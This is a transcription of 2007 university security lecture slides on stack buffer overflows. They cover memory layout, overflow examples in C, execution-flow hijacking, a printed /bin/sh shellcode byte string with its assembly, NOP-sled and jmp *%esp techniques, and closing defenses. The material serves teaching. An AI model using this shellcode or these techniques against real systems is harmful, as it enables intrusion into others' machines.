Lecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall Nitesh Saxena

Similar documents
Lecture 6: Buffer Overflow. CS 436/636/736 Spring Nitesh Saxena

Foundations of Network and Computer Security

Buffer overflows & friends CS642: Computer Security

Foundations of Network and Computer Security

Buffer overflows & friends CS642: Computer Security

Buffer Overflows. A brief Introduction to the detection and prevention of buffer overflows for intermediate programmers.

COMP 2355 Introduction to Systems Programming

Control Hijacking Attacks

CSC 405 Computer Security Shellcode

Foundations of Network and Computer Security

War Industries Presents: An Introduction to Programming for Hackers Part III - Advanced Variables & Flow Control.

COMP 3704 Computer Security

CSE 127 Computer Security

CSE 127 Computer Security

HW 8 CS681 & CS392 Computer Security Understanding and Experimenting with Memory Corruption Vulnerabilities DUE 12/18/2005

Topics. What is a Buffer Overflow? Buffer Overflows

Buffer Overflow Vulnerability

Buffer Overflow & Format Strings

CSE 127 Computer Security

Buffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through to

We will focus on Buffer overflow attacks SQL injections. See book for other examples

CS 392/681 Lab 6 Experiencing Buffer Overflows and Format String Vulnerabilities

CS 645: Lecture 3 Software Vulnerabilities. Rachel Greenstadt July 3, 2013

CIS 551 / TCOM 401 Computer and Network Security. Spring 2007 Lecture 2

Lab 2: Buffer Overflows

Lecture 08 Control-flow Hijacking Defenses

Lecture 04 Control Flow II. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Based on Michael Bailey s ECE 422

buffer overflow exploitation

Secure Systems Engineering

Secure Programming Lecture 3: Memory Corruption I (Stack Overflows)

Security and Privacy in Computer Systems. Lecture 5: Application Program Security

CS 161 Computer Security. Week of January 22, 2018: GDB and x86 assembly

CS4264 Programming Assignment 1 Buffer Overflow Vulnerability Due 02/21/2018 at 5:00 PM EST Submit through CANVAS

Linux Memory Layout. Lecture 6B Machine-Level Programming V: Miscellaneous Topics. Linux Memory Allocation. Text & Stack Example. Topics.

Buffer Overflows. Buffer Overflow. Many of the following slides are based on those from

Software Security II: Memory Errors - Attacks & Defenses

BUFFER OVERFLOW. Jo, Heeseung

Buffer Overflow. Jo, Heeseung

Buffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts

One-Slide Summary. Lecture Outline. Language Security

(Early) Memory Corruption Attacks

1 Recommended Readings

X86 Review Process Layout, ISA, etc. CS642: Computer Security. Drew Davidson

Roadmap: Security in the software lifecycle. Memory corruption vulnerabilities

1 Lab Overview. 2 Resources Required. CSC 666 Lab #11 Buffer Overflow November 29, 2012

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES

Buffer Overflow Vulnerability Lab

Is stack overflow still a problem?

Buffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University

Introduction to Computer Systems , fall th Lecture, Sep. 28 th

Architecture-level Security Vulnerabilities

06/21/04 15:09:12 smashing_the_stack_for_fun_and_profit.txt 1

CNIT 127: Exploit Development. Ch 2: Stack Overflows in Linux

This time. Defenses and other memory safety vulnerabilities. Everything you ve always wanted to know about gdb but were too afraid to ask

CS Programming Languages Fall Homework #2

Sandwiches for everyone

CMPSC 497 Buffer Overflow Vulnerabilities

CSE 565 Computer Security Fall 2018

Reserve Engineering & Buffer Overflow Attacks. Tom Chothia Computer Security, Lecture 17

CS155: Computer Security Spring Project #1. Due: Part 1: Thursday, April pm, Part 2: Monday, April pm.

Secure Software Development: Theory and Practice

Betriebssysteme und Sicherheit Sicherheit. Buffer Overflows

Format string vulnerabilities

Buffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.

Buffer Overflows Defending against arbitrary code insertion and execution

Università Ca Foscari Venezia

malloc() is often used to allocate chunk of memory dynamically from the heap region. Each chunk contains a header and free space (the buffer in which

Architecture-level Security Vulnerabilities. Julian Stecklina

CS , Fall 2004 Exam 1

CS 3214 Spring # Problem Points Min Max Average Median SD Grader. 1 Memory Layout and Locality Bill

CS 33: Week 3 Discussion. x86 Assembly (v1.0) Section 1G

CSc 466/566. Computer Security. 20 : Operating Systems Application Security

CS642: Computer Security

CS 33 (Week 4) Section 1G, Spring 2015 Professor Eggert (TA: Eric Kim) v1.0

Shell Code For Beginners

Lecture 09 Code reuse attacks. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017

The first Secure Programming Laboratory will be today! 3pm-6pm in Forrest Hill labs 1.B31, 1.B32.

CS241 Computer Organization Spring 2015 IA

Assembly Language: Function Calls

2 Resources Required. 3 Assignment Tasks. 3.1 Initial setup

Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it

Advanced Security for Systems Engineering VO 05: Advanced Attacks on Applications 2

Assembly Language: Function Calls" Goals of this Lecture"

ISA564 SECURITY LAB. Shellcode. George Mason University

Stack overflow exploitation

Security Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40

CS 161 Computer Security

Buffer Overflow Attacks

Language Security. Lecture 40

ISA 564, Laboratory I: Buffer Overflows

18-600: Recitation #4 Exploits

Assembly Language: Function Calls" Goals of this Lecture"

From Over ow to Shell

Buffer Overflows. CSC 482/582: Computer Security Slide #1

Lab 10: Introduction to x86 Assembly

Introduction to Reverse Engineering. Alan Padilla, Ricardo Alanis, Stephen Ballenger, Luke Castro, Jake Rawlins

CIS 2107 Computer Systems and Low-Level Programming Spring 2012 Final

logistics LEX assignment out exam in on week come with questions on Monday (review)

Foundations of Network and Computer Security

Secure Programming Lecture 6: Memory Corruption IV (Countermeasures)

Transcription:

Lecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall 2007 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit) and Stanislav Nurilov Course Admin HW#6 is being graded Solution to be posted HW#7 was due last night HW#8 (threat modeling) to be posted soon Final on Thursday, 12/20, 6 8:30pm? 11/18/2007 Lecture 9 - Buffer Overflow 2 1

Course Admin: HW #9 On Buffer Overflow Team up in groups of 2 each You will have (root) access to virtual machines in ISIS For the exercise, you ll have to create a user account and work under that account Make sure that you don t mess up the system Instructions and homework will follow later 11/18/2007 Lecture 9 - Buffer Overflow 3 Why study buffer overflow? Buffer overflow vulnerabilities are the most commonly exploited- account for about half of all new security problems (CERT) Are relatively easy to exploit Many variations on stack smash- heap overflows, etc. We ll focus upon static buffer overflow vulnerabilities 11/18/2007 Lecture 9 - Buffer Overflow 4 2

Recall the Security Life Cycle Threats Which stage? Policy Specification Design Implementation Operation and Maintenance 11/18/2007 Lecture 9 - Buffer Overflow 5 How Computer Works There is a processor that interfaces with various devices Processor executes instructions Add, sub, mult, jump and various functions 11/18/2007 Lecture 9 - Buffer Overflow 6 3

Where to get the instructions from Each process thinks that it has 4GB (2^32) of (virtual) memory Instructions are loaded into the memory Processor fetches and executes these instructions one by one How does the processor know where to return back after jumping and after returning from a function 11/18/2007 Lecture 9 - Buffer Overflow 7 Process Memory Organization 11/18/2007 Lecture 9 - Buffer Overflow 8 4

Process Memory Organization 11/18/2007 Lecture 9 - Buffer Overflow 9 Process Memory Organization 11/18/2007 Lecture 9 - Buffer Overflow 10 5

Function Calls 11/18/2007 Lecture 9 - Buffer Overflow 11 Function Calls 11/18/2007 Lecture 9 - Buffer Overflow 12 6

Buffer Overflow: Example void function(char *str) { char buffer[8]; strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); } 11/18/2007 Lecture 9 - Buffer Overflow 13 Buffer Overflows 11/18/2007 Lecture 9 - Buffer Overflow 14 7

Buffer Overflows 11/18/2007 Lecture 9 - Buffer Overflow 15 Buffer Overflows 11/18/2007 Lecture 9 - Buffer Overflow 16 8

Buffer Overflows 11/18/2007 Lecture 9 - Buffer Overflow 17 Buffer Overflows 11/18/2007 Lecture 9 - Buffer Overflow 18 9

Buffer Overflows 11/18/2007 Lecture 9 - Buffer Overflow 19 Buffer Overflows 11/18/2007 Lecture 9 - Buffer Overflow 20 10

Modifying the Execution Flow void function() { char buffer1[4]; int *ret; ret = buffer1 + 8; (*ret) += 8; } void main() { int x = 0; function(); x = 1; printf("%d\n",x); } 11/18/2007 Lecture 9 - Buffer Overflow 21 Modifying the Execution Flow 11/18/2007 Lecture 9 - Buffer Overflow 22 11

Modifying the Execution Flow 11/18/2007 Lecture 9 - Buffer Overflow 23 Modifying the Execution Flow 11/18/2007 Lecture 9 - Buffer Overflow 24 12

Modifying the Execution Flow 11/18/2007 Lecture 9 - Buffer Overflow 25 Exploiting Overflows- Smashing the Stack Now we can modify the flow of execution- what do we want to do now? Spawn a shell and issue commands from it 11/18/2007 Lecture 9 - Buffer Overflow 26 13

Exploiting Overflows- Smashing the Stack Now we can modify the flow of executionwhat do we want to do now? Spawn a shell and issue commands from it 11/18/2007 Lecture 9 - Buffer Overflow 27 Exploiting Overflows- Smashing the Stack What if there is no code to spawn a shell in the program we are exploiting? Place the code in the buffer we are overflowing, and set the return address to point back to the buffer! 11/18/2007 Lecture 9 - Buffer Overflow 28 14

Exploiting Overflows- Smashing the Stack What if there is no code to spawn a shell in the program we are exploiting? Place the code in the buffer we are overflowing, and set the return address to point back to the buffer! 11/18/2007 Lecture 9 - Buffer Overflow 29 Spawning a Shell #include <stdio.h> #include <stdlib.h> void main() { GDB char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); exit(0); } ASSEMBLY CODE 11/18/2007 Lecture 9 - Buffer Overflow 30 15

Spawning a Shell void main() { asm (" jmp 0x2a popl %esi movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax GDB movl %esi,%ebx BINARY CODE leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx int $0x80 call -0x2f 11/18/2007.string \"/bin/sh\" Lecture 9 - Buffer "); Overflow } 31 Spawning a Shell char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x 00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x8 0" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff " "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; 11/18/2007 Lecture 9 - Buffer Overflow 32 16

How to find Shellcode 1. Guess - time consuming - being wrong by 1 byte will lead to segmentation fault or invalid instruction 11/18/2007 Lecture 9 - Buffer Overflow 33 How to find Shellcode 2. Pad shellcode with NOP s then guess - we don t need to be exactly on - much more efficient 11/18/2007 Lecture 9 - Buffer Overflow 34 17

Can we do better? If we can find the address where SP points to, we are home 11/18/2007 Lecture 9 - Buffer Overflow 35 Can we do better? Find out what shared libaries are being used by the vulnerable program Use ldd command This also provides the starting address where the shared libraries are stored in process s memory Find out where in the shared library the instruction jmp *%esp occurs Add this to the starting address of the shared library At %esp, store the instruction jmp constant offset 11/18/2007 Lecture 9 - Buffer Overflow 36 18

Consider the simple program 11/18/2007 Lecture 9 - Buffer Overflow 37 Stack Contents Normal Execution 11/18/2007 Lecture 9 - Buffer Overflow 38 19

Stack Contents buffer overflow 11/18/2007 Lecture 9 - Buffer Overflow 39 How to prevent buffer overflows Programmer level: Check the length of the input Use functions strncpy (instead of strcpy) OS level: Techniques such as address space layout randomization 11/18/2007 Lecture 9 - Buffer Overflow 40 20

References Smashing the Stack for Fun and Profit: http://doc.bughunter.net/buffer-overflow/smashstack.html Text Book? 11/18/2007 Lecture 9 - Buffer Overflow 41 21

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback